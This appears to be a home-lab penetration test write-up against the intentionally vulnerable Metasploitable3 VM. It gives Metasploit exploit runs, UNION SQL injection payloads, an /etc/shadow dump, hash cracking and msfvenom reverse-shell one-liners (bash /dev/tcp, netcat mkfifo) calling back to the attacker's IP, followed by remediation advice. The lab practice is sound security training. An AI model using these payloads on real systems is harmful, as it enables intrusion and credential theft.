## https://sploitus.com/exploit?id=940D3E5C-AE93-53BD-8624-960D303D8D53
# ๐ก๏ธ Metasploitable3 โ Home Lab Penetration Test Report
> **Author:** [Sudo-Creator](https://github.com/Sudo-Creator)
> **Environment:** VirtualBox ยท Kali Linux (Attacker) ยท Metasploitable3 Ubuntu 14.04 (Target)
> **Target IP:** 10.0.2.5
> **Scope:** Full network penetration test โ enumeration, exploitation, and post-exploitation
> **Type:** Home Lab / Capture The Flag Practice
---
## ๐ Table of Contents
- [Lab Environment](#-lab-environment)
- [Phase 1 โ Host Discovery & Port Scanning](#phase-1--host-discovery--port-scanning)
- [Phase 2 โ Service Enumeration](#phase-2--service-enumeration)
- [Phase 3 โ Exploitation](#phase-3--exploitation)
- [UnrealIRCd Backdoor (Port 6697)](#1-unrealircd-backdoor--port-6697)
- [Drupal Drupageddon โ SQLi (Port 80)](#2-drupal-drupageddon--sqli--port-80)
- [SQL Injection โ Payroll App](#3-sql-injection--payroll-app)
- [SSH Login โ Credential Reuse (Port 22)](#4-ssh-login--credential-reuse--port-22)
- [ProFTPD mod_copy (Port 21)](#5-proftpd-mod_copy--port-21)
- [Phase 4 โ Privilege Escalation](#phase-4--privilege-escalation)
- [Phase 5 โ Post Exploitation & Reverse Shells](#phase-5--post-exploitation--reverse-shells)
- [Findings Summary](#-findings-summary)
- [Remediation Recommendations](#-remediation-recommendations)
- [Tools Used](#-tools-used)
- [Disclaimer](#-disclaimer)
---
## ๐ฅ๏ธ Lab Environment
| Component | Details |
|---|---|
| Hypervisor | Oracle VirtualBox |
| Attacker Machine | Kali Linux |
| Target Machine | Metasploitable3 (Ubuntu 14.04.6 LTS) |
| Target MAC | `08:00:27:BD:86:A4` (Oracle VirtualBox NIC) |
| Network | Internal / Host-Only Adapter |
---
## Phase 1 โ Host Discovery & Port Scanning
### Nmap Full Port Scan
A comprehensive Nmap scan was performed against the target to identify open ports, running services, and the operating system.
```bash
sudo nmap -O -sV -p- -oA metasploitable3 10.0.2.5
```
**Flags used:**
| Flag | Purpose |
|---|---|
| `-O` | OS detection |
| `-sV` | Service/version detection |
| `-p-` | Scan all 65535 ports |
| `-oA` | Save output in all formats |
### Scan Results
```
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13
80/tcp open http Apache httpd 2.4.7 (Ubuntu)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X
631/tcp open ipp CUPS 1.7
3306/tcp open mysql MySQL (unauthorized)
3500/tcp open http WEBrick httpd 1.3.1 (Ruby 2.3.8)
6697/tcp open irc UnrealIRCd
8080/tcp open http Jetty 8.1.7.v20120910
```
**OS Detection:** Linux (Ubuntu 14.04), Kernel `3.13.0-170-generic`
---
## Phase 2 โ Service Enumeration
### Port 21 โ FTP (ProFTPD 1.3.5)
ProFTPD 1.3.5 is known to be vulnerable to the **mod_copy** command execution vulnerability (`CVE-2015-3306`). The `SITE CPFR/CPTO` commands allow any unauthenticated user to copy arbitrary files across the filesystem with the privileges of the ProFTPD daemon (`nobody` user by default). This can be abused to copy a PHP payload into the web root for remote code execution.
### Port 22 โ SSH (OpenSSH 6.6.1p1)
The SSH service banner reveals a significantly outdated version of OpenSSH. Metasploit's `auxiliary/scanner/ssh/ssh_version` scanner confirmed the server supports multiple **deprecated algorithms**, including `arcfour`, `blowfish-cbc`, `3des-cbc`, `diffie-hellman-group1-sha1`, and `ecdsa-sha2-nistp256` (weak elliptic curve). No publicly exploitable RCE was identified for this version, but the deprecated cipher suite is a significant weakness.
### Port 80 โ HTTP (Apache 2.4.7 + Drupal 7.5)
- Visiting `http://10.0.2.5` revealed a **Drupal 7.5** CMS installation.
- The Drupal version was confirmed via `CHANGELOG.txt`.
- A `robots.txt` review exposed several sensitive endpoints: `/admin/`, `/install.php`, `/update.php`, `/xmlrpc.php`, etc.
- A secondary application `payroll_app.php` was discovered and found to be vulnerable to **UNION-based SQL injection**.
- Apache 2.4.7 is also susceptible to **mod_rewrite SSRF** via unsafe `[P]` flag usage.
### Port 445 โ SMB (Samba)
The target machine was running Samba. The version appeared to have been spoofed during Metasploit testing, preventing reliable exploitation during this engagement.
### Port 6697 โ IRC (UnrealIRCd)
The IRC service was running **UnrealIRCd**. This service is notorious for a critical backdoor vulnerability in version `3.2.8.1` (`CVE-2010-2075`) that allows unauthenticated remote command execution.
### Port 3306 โ MySQL
MySQL was running but returned an `unauthorized` banner, indicating it was not directly accessible without credentials.
---
## Phase 3 โ Exploitation
---
### 1. UnrealIRCd Backdoor โ Port 6697
**CVE:** CVE-2010-2075
**Module:** `exploit/unix/irc/unreal_ircd_3281_backdoor`
**Result:** โ Shell as `boba_fett`
UnrealIRCd 3.2.8.1 contains a backdoor introduced via a compromised source code distribution. Sending a specially crafted string to the IRC port triggers command execution on the server.
```bash
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(...) > set LHOST 10.147.62.126
msf exploit(...) > set RHOST 10.147.62.192
msf exploit(...) > set RPORT 6697
msf exploit(...) > set payload cmd/unix/reverse_perl
msf exploit(...) > run
```
```
[*] Started reverse TCP handler on 10.147.62.126:4444
[*] 10.147.62.192:6697 - Sending IRC backdoor command
[*] Command shell session 1 opened (10.147.62.126:4444 -> 10.147.62.192:53611)
whoami
boba_fett
pwd
/opt/unrealircd/Unreal3.2
```
**Note:** The initial shell landed in the UnrealIRCd directory as `boba_fett`. Navigation to other directories was restricted by the user's privilege level, confirming this was a low-privilege foothold.
---
### 2. Drupal Drupageddon โ SQLi โ Port 80
**CVE:** CVE-2014-3704 (Drupageddon)
**Module:** `exploit/multi/http/drupal_drupageddon`
**Result:** โ Shell as `www-data`
Drupal 7.x before 7.32 is vulnerable to a critical SQL injection in the database abstraction layer. This allows unauthenticated attackers to execute arbitrary queries, ultimately leading to remote code execution.
```bash
msf > use exploit/multi/http/drupal_drupageddon
msf exploit(...) > set RHOSTS 10.147.62.192
msf exploit(...) > set payload php/reverse_perl
msf exploit(...) > run
```
```
[*] Started reverse TCP handler on 10.147.62.126:4444
[*] Command shell session 1 opened (10.147.62.126:4444 -> 10.147.62.192:53682)
whoami
www-data
```
**Post-exploitation enumeration from this shell:**
Drupal version confirmed:
```bash
cat CHANGELOG.txt
# Drupal 7.5, 2011-07-27
```
System users discovered:
```bash
ls ../../../../../../home
anakin_skywalker artoo_detoo ben_kenobi boba_fett
c_three_pio chewbacca darth_vader greedo
han_solo jabba_hutt jarjar_binks kylo_ren
lando_calrissian leia_organa luke_skywalker vagrant
```
---
### 3. SQL Injection โ Payroll App
**Type:** UNION-Based SQL Injection (Manual)
**Target:** `http://10.0.2.5/payroll_app.php`
**Result:** โ Full database dump including plaintext credentials
The `payroll_app.php` login form was tested with SQL injection payloads. A basic authentication bypass confirmed the vulnerability, and further UNION-based payloads enumerated the full database.
**Authentication Bypass:**
```sql
' or 1=1#
```
This returned all records from the users table, including `username`, `first_name`, `last_name`, and `salary`, confirming a 4-column table structure.
**Database Version:**
```sql
' UNION SELECT null, null, @@version, null#
-- Result: 5.5.62-0ubuntu0.14.04.1
```
**Enumerate Databases:**
```sql
' UNION SELECT null,null,GROUP_CONCAT(schema_name),null FROM information_schema.schemata#
-- Result: information_schema | drupal | mysql | payroll | performance_schema
```
**Enumerate Tables in `payroll`:**
```sql
' UNION SELECT null,null,null,GROUP_CONCAT(0x7c,table_name,0x7C)
FROM information_schema.tables WHERE table_schema='payroll'#
-- Result: users
```
**Enumerate Columns in `users`:**
```sql
' UNION SELECT null,null,null,GROUP_CONCAT(0x7c,column_name,0x7C)
FROM information_schema.columns WHERE table_name='users'#
-- Result: uid | name | pass | username | first_name | last_name | password | salary | ...
```
**Dump Credentials:**
```sql
' UNION SELECT username, password, salary, null FROM users#
```
| Username | Password | Salary |
|---|---|---|
| leia_organa | help_me_obiwan | 9560 |
| luke_skywalker | like_my_father_beforeme | 1080 |
| han_solo | nerf_herder | 1200 |
| artoo_detoo | b00p_b33p | 22222 |
| c_three_pio | Pr0t0c07 | 3200 |
| ben_kenobi | thats_no_m00n | 10000 |
| darth_vader | Dark_syD3 | 6666 |
| anakin_skywalker | but_master:( | 1025 |
| jarjar_binks | mesah_p@ssw0rd | 2048 |
| lando_calrissian | @dm1n1str8r | 40000 |
| boba_fett | mandalorian1 | 20000 |
| jabba_hutt | my_kinda_skum | 65000 |
| greedo | hanSh0tF1rst | 50000 |
| chewbacca | rwaaaaawr8 | 4500 |
| kylo_ren | Daddy_Issues2 | 6667 |
---
### 4. SSH Login โ Credential Reuse โ Port 22
**Module:** `auxiliary/scanner/ssh/ssh_login`
**Result:** โ Shell as `vagrant` (sudo ALL privileges)
SSH version enumeration was performed first to fingerprint the server:
```bash
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(...) > set RHOSTS 10.147.62.192
msf auxiliary(...) > run
```
```
SSH server version: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13
```
The scan confirmed numerous **deprecated cipher algorithms**, including `arcfour256`, `blowfish-cbc`, `3des-cbc`, `arcfour128`, and deprecated key exchange methods including `diffie-hellman-group1-sha1`. This indicates the system is severely out of date.
The default Metasploitable3 credential pair `vagrant:vagrant` was then tested:
```bash
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(...) > set RHOST 10.147.62.192
msf auxiliary(...) > set USERNAME vagrant
msf auxiliary(...) > set PASSWORD vagrant
msf auxiliary(...) > set THREADS 3
msf auxiliary(...) > run
```
```
[+] 10.147.62.192:22 - Success: 'vagrant:vagrant'
uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo)
[*] SSH session 1 opened
```
**Privilege Check:**
```bash
sudo -l
User vagrant may run the following commands on metasploitable3-ub1404:
(ALL : ALL) ALL
(ALL : ALL) NOPASSWD: ALL
```
The `vagrant` user has **full unrestricted sudo access with no password required**, effectively equivalent to root.
Shell upgraded to interactive PTY:
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
---
### 5. ProFTPD mod_copy โ Port 21
**CVE:** CVE-2015-3306
**Module:** `exploit/unix/ftp/proftpd_modcopy_exec`
**Result:** โ ๏ธ Module failed against this target instance
The FTP service was identified as ProFTPD 1.3.5. While the `proftpd_modcopy_exec` Metasploit module exists for this vulnerability, it **did not succeed** against this Metasploitable3 instance. This may be due to specific configuration differences or restrictions in this build.
**Vulnerability Summary:** The `mod_copy` module allows unauthenticated users to copy files via `SITE CPFR` / `SITE CPTO` commands with the daemon's privileges, which can be chained with a webshell for RCE.
---
## Phase 4 โ Privilege Escalation
### Path 1 โ Sudo via SSH (vagrant)
The `vagrant` user already had `NOPASSWD: ALL` sudo rights, granting immediate root-level access:
```bash
sudo su
id
# uid=0(root) gid=0(root) groups=0(root)
```
### Path 2 โ Sudo via Credential Reuse (luke_skywalker)
Credentials dumped from the SQL injection were tested over SSH. `luke_skywalker:like_my_father_beforeme` was valid:
```bash
ssh luke_skywalker@10.147.62.192
sudo -l
# User luke_skywalker may run the following commands:
# (ALL : ALL) ALL
```
`luke_skywalker` also had full sudo access. This allowed dumping `/etc/shadow`:
```
vagrant:$6$NABMNgxO$T2lvEhArjOImjvROySq8vka/...
leia_organa:$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/
luke_skywalker:$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/
darth_vader:$1$rLuMkR1R$YHumHRxhswnfO7eTUUfHJ.
lando_calrissian:$1$Af1ek3xT$nKc8jkJ30gMQWeW/6.ono0
# ... (all 16 hashes dumped)
```
**Offline Hash Cracking Attempt (John the Ripper):**
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt hashes.txt
```
The session was aborted due to hardware speed limitations before cracking completed. The hashes use `md5crypt ($1$)` which is a relatively weak hashing scheme and would be crackable given sufficient compute time.
**Proof of Compromise (PoC) โ User Creation:**
```bash
sudo useradd dean
sudo usermod -a -G audio dean
id
# uid=0(root) gid=0(root) groups=0(root)
su dean
id
# uid=1001(dean) gid=1001(dean) groups=1001(dean),29(audio)
```
---
## Phase 5 โ Post Exploitation & Reverse Shells
Multiple reverse shell techniques were demonstrated using `msfvenom` to generate payloads and `netcat` as the listener.
### Bash Reverse Shell
```bash
msfvenom -p cmd/unix/reverse_bash LHOST=10.147.62.126 LPORT=4444 R
# Payload: bash -c '0/dev/tcp/10.147.62.126/4444;sh &217 2>&217'
```
Listener:
```bash
nc -lnvp 4444
```
Callback received:
```
connect to [10.147.62.126] from (UNKNOWN) [10.147.62.192] 60784
whoami
vagrant
```
---
### Netcat Reverse Shell (mkfifo)
```bash
msfvenom -p cmd/unix/reverse_netcat LHOST=10.147.62.126 LPORT=4444 R
# Payload: mkfifo /tmp/kghs; nc 10.147.62.126 4444 0/tmp/kghs 2>&1; rm /tmp/kghs
```
Callback received:
```
connect to [10.147.62.126] from (UNKNOWN) [10.147.62.192] 60795
whoami
vagrant
id
uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo)
```
---
### PHP Reverse Shell
```bash
msfvenom -p php/unix/cmd/reverse_python LHOST=10.147.62.126 LPORT=4444 R > reverse.php
```
The payload was saved to `reverse.php`, uploaded to the target via SSH, and executed:
```bash
php reverse.php
```
Callback received from the PHP payload via the Apache web server's PHP interpreter, confirming remote code execution through the web stack.
---
## ๐ Findings Summary
| # | Vulnerability | Port | Severity | Result |
|---|---|---|---|---|
| 1 | UnrealIRCd 3.2.8.1 Backdoor (CVE-2010-2075) | 6697 | ๐ด Critical | Shell as `boba_fett` |
| 2 | Drupal Drupageddon SQLi (CVE-2014-3704) | 80 | ๐ด Critical | Shell as `www-data` |
| 3 | UNION-Based SQL Injection โ Payroll App | 80 | ๐ด Critical | Full DB dump + plaintext creds |
| 4 | SSH Default Credentials (`vagrant:vagrant`) | 22 | ๐ด Critical | Root-level access (NOPASSWD sudo) |
| 5 | Credential Reuse โ `luke_skywalker` SSH | 22 | ๐ด Critical | Root-level access (sudo ALL) |
| 6 | Shadow File Dumped โ md5crypt Hashes | N/A | ๐ด Critical | 16 hashes extracted |
| 7 | ProFTPD 1.3.5 mod_copy (CVE-2015-3306) | 21 | ๐ High | Not exploitable in this build |
| 8 | Deprecated SSH Cipher Suite | 22 | ๐ก Medium | Info only โ legacy algos confirmed |
| 9 | Drupal `CHANGELOG.txt` / `robots.txt` exposed | 80 | ๐ก Medium | Version disclosure |
| 10 | Plaintext Credentials in Database | 3306 | ๐ด Critical | Passwords stored in cleartext |
---
## ๐ง Remediation Recommendations
| Finding | Recommendation |
|---|---|
| UnrealIRCd Backdoor | Upgrade to a patched, verified version of UnrealIRCd; verify source integrity with checksums |
| Drupal Drupageddon | Upgrade Drupal to the latest stable release; apply security patches immediately |
| SQL Injection (Payroll) | Use parameterised queries / prepared statements; never concatenate user input into SQL |
| Default SSH Credentials | Remove or rotate default `vagrant` credentials; enforce key-based authentication only |
| Credential Reuse | Enforce unique passwords per service; implement a password policy |
| Weak Password Hashing | Replace `md5crypt ($1$)` with `bcrypt` or `Argon2id`; never store passwords in plaintext |
| Deprecated SSH Ciphers | Harden `sshd_config` to disable all deprecated algorithms; upgrade to OpenSSH 9.x+ |
| Sudo Misconfiguration | Remove `NOPASSWD: ALL` grants; apply least-privilege sudo rules per user |
| Version Disclosure | Restrict access to `CHANGELOG.txt`, `robots.txt`, and sensitive configuration files |
| ProFTPD mod_copy | Disable `mod_copy` in `proftpd.conf` or upgrade to a patched version |
---
## ๐ ๏ธ Tools Used
| Tool | Purpose |
|---|---|
| `nmap` | Port scanning, service/version detection, OS fingerprinting |
| `Metasploit Framework` | Exploitation, auxiliary scanners, session management |
| `msfvenom` | Reverse shell payload generation |
| `netcat (nc)` | Reverse shell listener |
| `John the Ripper` | Offline password hash cracking |
| `SSH` | Remote access and payload delivery |
| Manual SQL Injection | UNION-based injection via browser / curl |
---
## โ ๏ธ Disclaimer
> This penetration test was conducted **exclusively within a personal home lab environment** using intentionally vulnerable software (Metasploitable3 by Rapid7). All activity was performed on isolated virtual machines with no connection to any production network, third-party systems, or external infrastructure.
>
> **This report is intended solely for educational purposes and personal skill development.** Performing any of these techniques against systems without explicit written permission is illegal and unethical.
>
> The author does not condone unauthorised access to computer systems.
---
Built with ๐ by Sudo-Creator